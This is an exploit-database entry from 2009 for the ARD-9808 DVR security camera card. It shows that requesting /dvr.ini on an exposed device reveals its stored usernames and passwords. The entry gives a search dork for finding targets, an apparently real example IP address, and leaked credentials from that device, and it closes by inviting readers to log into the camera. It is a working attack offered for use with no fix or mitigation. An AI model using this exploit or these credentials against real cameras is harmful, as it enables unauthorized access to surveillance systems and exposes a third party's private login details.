ARD-9808 DVR Card Security Camera Arbitrary Config Disclosure Vuln

2009-07-01T00:00:00
ID 1337DAY-ID-9482
Type zdt
Reporter Septemb0x
Modified 2009-07-01T00:00:00

Description

Exploit for hardware platform in category remote exploits

                                        
                                            ==================================================================
ARD-9808 DVR Card Security Camera Arbitrary Config Disclosure Vuln
==================================================================



-------------------------------------------------
SoftWare Name : ARD-9808 DVR Card Security Camera Passwords View Bug
-------------------------------------------------
Author : Septemb0x
Software Download : http://www.armassa.com.tr/shop/down/ard9808.rar = Open To Rar > DVR > Dvr.ini
D0rk : "To enable control work: Tools->Internet Options->Security->Custom Level   Reset to: Low Or Download"
-------------------------------------------------
Exploit: http://[sitename-ipadress]/dvr.ini
-------------------------------------------------
Example: http://88.249.248.177/dvr.ini
Show;
[PASSWORD]
administrator=
password_a=
user=
password=
enable=0
user0=ozcan = Camera Username
password0=3893 = Camera Password
right0=223
encode=1
num=2
user1=yurt
password1=yurt
right1=223
.
.
.
... Login The Camera :)
-------------------------------------------------
Greetz : BHDR, BARCOD3
-------------------------------------------------



#  0day.today [2018-04-03]  #